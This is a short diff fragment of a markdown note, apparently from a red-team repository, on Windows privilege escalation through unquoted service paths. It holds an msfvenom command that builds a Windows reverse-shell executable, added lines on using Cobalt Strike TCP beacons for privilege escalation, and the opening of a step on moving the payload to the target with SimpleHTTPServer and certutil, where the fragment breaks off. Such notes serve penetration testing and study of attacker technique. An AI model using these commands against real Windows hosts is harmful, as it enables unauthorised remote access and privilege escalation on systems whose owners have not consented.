CraigDonkin/Infrastructure/WinPrivEsc/Windows Priv Esc- Unqouted Service Paths.md

 msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f exe -o name.exe
 ```

+In Cobalt Strike, use TCP beacons bound to localhost for priv esc.
+The beacon will have svc in the filename when using the CS generate all option.

 ### Transfer the file

 You could host the file using SimpleHTTPServer and then use certutil: